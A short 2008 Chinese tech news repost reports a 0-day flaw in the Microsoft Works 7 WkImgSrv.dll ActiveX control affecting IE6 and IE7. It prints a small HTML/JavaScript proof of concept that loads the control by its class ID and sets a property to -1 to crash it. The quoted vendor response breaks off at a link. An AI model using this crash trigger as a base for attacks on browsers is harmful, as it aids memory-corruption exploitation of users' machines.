智能手机访问入口 diglog.com/m

Win组件0Day漏洞通杀IE6与IE7

mylovehisa 提交于2008-4-24 10:15:18

标签 IT 


中国IT实验室4月21日报道:近日收到网友发来的邮件,反映了一个Windows0Day漏洞。并在其博客中给出了相关代码。

[0day]Microsoft Works 7 WkImgSrv.dll crash POC,dll版本7.03.0616.0,IE7+Windows XP SP2 测试通过。

[html]
[head]
[title]Microsoft Works 7 WkImgSrv.dll crash POC[/title]
[script language="JavaScript"]
function payload() {
var num = -1;
obj.WksPictureInterface = num;
}
[/script]
[/head]
[body ]
[object classid="clsid:00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6" id="obj"]
[/object]
[/body]
[/html]

与金山专家李铁军联系,得到了珠海研发中心的回复,如下:

近几天网络上流传
点击进入链接 http://feeds.feedburner.com/~r/shumait/~3/276573329/articlepickservlet



 



正在加载评论...
发表评论

* 昵称:

博客(可不填写):

*您的评论:
高兴悲伤 惊讶 挂掉! 困惑 冷静 气愤 尴尬 受不了啦 转动眼睛 眨眼 睡梦中     

*输入验证码: